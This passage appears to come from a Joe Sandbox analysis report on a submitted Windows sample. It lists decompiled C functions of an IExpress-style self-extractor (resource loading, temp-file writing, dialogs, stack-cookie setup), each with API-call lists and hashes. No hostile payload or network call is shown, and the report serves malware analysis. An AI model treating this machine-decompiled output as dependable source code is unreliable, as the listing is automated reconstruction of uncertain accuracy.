                                                                                                                                                                                                                                              							return LocalFree(_t21);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						_push(0x40);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						_push(_t21);
                                                                                                                                                                                                                                              						_t18 = 0x3e9;
                                                                                                                                                                                                                                              						L6:
                                                                                                                                                                                                                                              						E001A44B9(0, _t18);
                                                                                                                                                                                                                                              						goto L7;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					_push(0x10);
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					_t18 = 0x4b1;
                                                                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              			}






                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46A0
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: SizeofResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46A9
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46C3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LoadResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46CC
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LockResource.KERNEL32(00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46D3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: memcpy_s.MSVCRT ref: 001A46E5
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,001A30B4), ref: 001A4189
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,001A30B4), ref: 001A41E7
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                              • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                              • Opcode ID: b4152335d46439f4b76aeb0e8736d8ea2a727242cc8a90fb0aa12ae0d8f4f79f
                                                                                                                                                                                                                                              • Instruction ID: 5c0c97890d841b72d9c9007abd311eab49e34f1f83809cc8fe25fbe88464dd22
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4152335d46439f4b76aeb0e8736d8ea2a727242cc8a90fb0aa12ae0d8f4f79f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD01F4FD3002243BF7252A658C86F7B218EDFEB7A5F514025B705E15809BE8DC4141B5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A7155() {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				struct _FILETIME _v16;
                                                                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                                                                              				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                                                                              				signed int _t36;
                                                                                                                                                                                                                                              				signed int _t37;
                                                                                                                                                                                                                                              				signed int _t39;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                              				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                              				_t23 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                              					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                              					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                              					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                              					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                              					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                              					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                              					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                              					_t39 = _t36;
                                                                                                                                                                                                                                              					if(_t36 == 0xbb40e64e || ( *0x1a8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                              						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                              						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *0x1a8004 = _t39;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t37 =  !_t36;
                                                                                                                                                                                                                                              				 *0x1a8008 = _t37;
                                                                                                                                                                                                                                              				return _t37;
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001A7182
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 001A7191
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 001A719A
                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 001A71A3
                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 001A71B8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1445889803-0
                                                                                                                                                                                                                                              • Opcode ID: b196cb6d69bfd7031fb3d9d40812179e4a8a2b4bc9a0f0224093298a0c171415
                                                                                                                                                                                                                                              • Instruction ID: 73cf894743ccab6baa08a052632b90dbb181731eb0ec8dbe4775a2494d83794c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b196cb6d69bfd7031fb3d9d40812179e4a8a2b4bc9a0f0224093298a0c171415
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15113A75D01208EBCB10DFB8DA48A9EBBF4FF0A314FA14865E801E7250EB309B45CB41
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E001A19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v520;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t11;
                                                                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                                                                              				struct HWND__* _t34;
                                                                                                                                                                                                                                              				signed int _t35;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t33 = __edi;
                                                                                                                                                                                                                                              				_t27 = __ebx;
                                                                                                                                                                                                                                              				_t11 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                              				_t34 = _a4;
                                                                                                                                                                                                                                              				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                              				if(_t14 == 0) {
                                                                                                                                                                                                                                              					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                              					E001A43D0(_t34, _t15);
                                                                                                                                                                                                                                              					_v520 = 0;
                                                                                                                                                                                                                                              					LoadStringA( *0x1a9a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                              					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                              					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					if(_t14 != 1) {
                                                                                                                                                                                                                                              						L4:
                                                                                                                                                                                                                                              						_t23 = 0;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t32 = _a12;
                                                                                                                                                                                                                                              						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                              							goto L4;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                              							L6:
                                                                                                                                                                                                                                              							_t23 = 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                              			}














                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 001A1A18
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 001A1A24
                                                                                                                                                                                                                                              • LoadStringA.USER32(?,?,00000200), ref: 001A1A4F
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 001A1A62
                                                                                                                                                                                                                                              • MessageBeep.USER32(000000FF), ref: 001A1A6A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1273765764-0
                                                                                                                                                                                                                                              • Opcode ID: 44e9acdcb3d5522a7e934de685259d1feb4a64cd24072cb730afed84ec27b9a0
                                                                                                                                                                                                                                              • Instruction ID: d6fc6445fcb14898fa2785318f27835ba22d47788daf0695bcaa1e13da486a00
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44e9acdcb3d5522a7e934de685259d1feb4a64cd24072cb730afed84ec27b9a0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0011CB35600159BBCB10EF68EE08AAE77B8EF4A310F408150FA22D35A0DB309E85CB95
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                                                                                                              			E001A63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				long _v272;
                                                                                                                                                                                                                                              				void* _v276;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                                                                              				long _t28;
                                                                                                                                                                                                                                              				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                              				void* _t39;
                                                                                                                                                                                                                                              				signed int _t40;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t15 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                              				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_v276 = _a16;
                                                                                                                                                                                                                                              				_t37 = 1;
                                                                                                                                                                                                                                              				E001A1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                              				E001A658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                              				_t28 = 0;
                                                                                                                                                                                                                                              				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                              				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                              					_t28 = _a4;
                                                                                                                                                                                                                                              					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                              						 *0x1a9124 = 0x80070052;
                                                                                                                                                                                                                                              						_t37 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					CloseHandle(_t39);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					 *0x1a9124 = 0x80070052;
                                                                                                                                                                                                                                              					_t37 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                              			}
















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 001A642D
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 001A645B
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 001A647A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 001A63EB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                              • API String ID: 1065093856-3647970563
                                                                                                                                                                                                                                              • Opcode ID: 5735de31986d20fa5e71a52d43d859d62efb4d0cf87863164d01200d953dea02
                                                                                                                                                                                                                                              • Instruction ID: 28263b393982f6dc6e59855b4f6d29f292b552214040d04c624fd82a2cc8cea3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5735de31986d20fa5e71a52d43d859d62efb4d0cf87863164d01200d953dea02
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F21D2B5A00218AFDB11DF25DC85FEB7778EB5A324F0041A9F595A3280DBB05DC58FA4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A47E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                              				intOrPtr _t6;
                                                                                                                                                                                                                                              				intOrPtr _t9;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                                                                              				intOrPtr* _t22;
                                                                                                                                                                                                                                              				void _t24;
                                                                                                                                                                                                                                              				struct HWND__* _t25;
                                                                                                                                                                                                                                              				struct HWND__* _t26;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				intOrPtr* _t28;
                                                                                                                                                                                                                                              				intOrPtr* _t33;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t33 = __ecx;
                                                                                                                                                                                                                                              				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                              				if(_t34 != 0) {
                                                                                                                                                                                                                                              					_t22 = _t33;
                                                                                                                                                                                                                                              					_t27 = _t22 + 1;
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t6 =  *_t22;
                                                                                                                                                                                                                                              						_t22 = _t22 + 1;
                                                                                                                                                                                                                                              					} while (_t6 != 0);
                                                                                                                                                                                                                                              					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                              					 *_t34 = _t24;
                                                                                                                                                                                                                                              					if(_t24 != 0) {
                                                                                                                                                                                                                                              						_t28 = _t33;
                                                                                                                                                                                                                                              						_t19 = _t28 + 1;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t9 =  *_t28;
                                                                                                                                                                                                                                              							_t28 = _t28 + 1;
                                                                                                                                                                                                                                              						} while (_t9 != 0);
                                                                                                                                                                                                                                              						E001A1680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                              						_t11 =  *0x1a91e0; // 0x2988e30
                                                                                                                                                                                                                                              						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                              						 *0x1a91e0 = _t34;
                                                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t25 =  *0x1a8584; // 0x0
                                                                                                                                                                                                                                              					E001A44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                              					LocalFree(_t34);
                                                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t26 =  *0x1a8584; // 0x0
                                                                                                                                                                                                                                              				E001A44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                              				goto L2;
                                                                                                                                                                                                                                              			}
















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,001A4E6F), ref: 001A47EA
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 001A4823
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 001A4847
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 001A4851
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                              • API String ID: 359063898-3647970563
                                                                                                                                                                                                                                              • Opcode ID: 422b545b6dfef11b0f061aef59b5fda29997fa069f58b90efd767fbd175398ee
                                                                                                                                                                                                                                              • Instruction ID: 5db7fa8eab8bd521e646b01fc96f04cefcf353ab226cc328032a32777de74bcd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 422b545b6dfef11b0f061aef59b5fda29997fa069f58b90efd767fbd175398ee
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD1102BD6046416FD7198F74AC18F723B5AEBC7310F048519FE828B641DBB98C46C660
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                                                                                              			E001A6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                              				struct HRSRC__* _t6;
                                                                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                              				int _t24;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t23 =  *0x1a9a3c; // 0x1a0000
                                                                                                                                                                                                                                              				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                              				if(_t6 == 0) {
                                                                                                                                                                                                                                              					L6:
                                                                                                                                                                                                                                              					E001A44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					_t24 = _a16;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                              					if(_t21 == 0) {
                                                                                                                                                                                                                                              						goto L6;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(_a12 != 0) {
                                                                                                                                                                                                                                              							_push(_a12);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                              						FreeResource(_t21);
                                                                                                                                                                                                                                              						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t24;
                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(001A0000,000007D6,00000005), ref: 001A652A
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(001A0000,00000000,?,?,001A2EE8,00000000,001A19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 001A6538
                                                                                                                                                                                                                                              • DialogBoxIndirectParamA.USER32(001A0000,00000000,00000547,001A19E0,00000000), ref: 001A6557
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,001A2EE8,00000000,001A19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 001A6560
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1214682469-0
                                                                                                                                                                                                                                              • Opcode ID: a5eccd52ee8412f8e97a41878d1f4fcaef573d4d66ddb2895405a86c09550ddb
                                                                                                                                                                                                                                              • Instruction ID: 44953d3d0d05d1dd26d2df16ce445a1c7fc194a896880c378bdeff0235993bb9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5eccd52ee8412f8e97a41878d1f4fcaef573d4d66ddb2895405a86c09550ddb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 930149B6500205BBCB105FA9AC08DBB7A6DEF8B7A0F080125FE0093150D771CC50C6A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A3680(void* __ecx) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				struct tagMSG _v36;
                                                                                                                                                                                                                                              				int _t8;
                                                                                                                                                                                                                                              				struct HWND__* _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_v8 = __ecx;
                                                                                                                                                                                                                                              				_t16 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                              					if(_t8 == 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                              								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t16 = 1;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                              						} while (_t8 != 0);
                                                                                                                                                                                                                                              						if(_t16 == 0) {
                                                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					break;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t8;
                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 001A369F
                                                                                                                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001A36B2
                                                                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 001A36CB
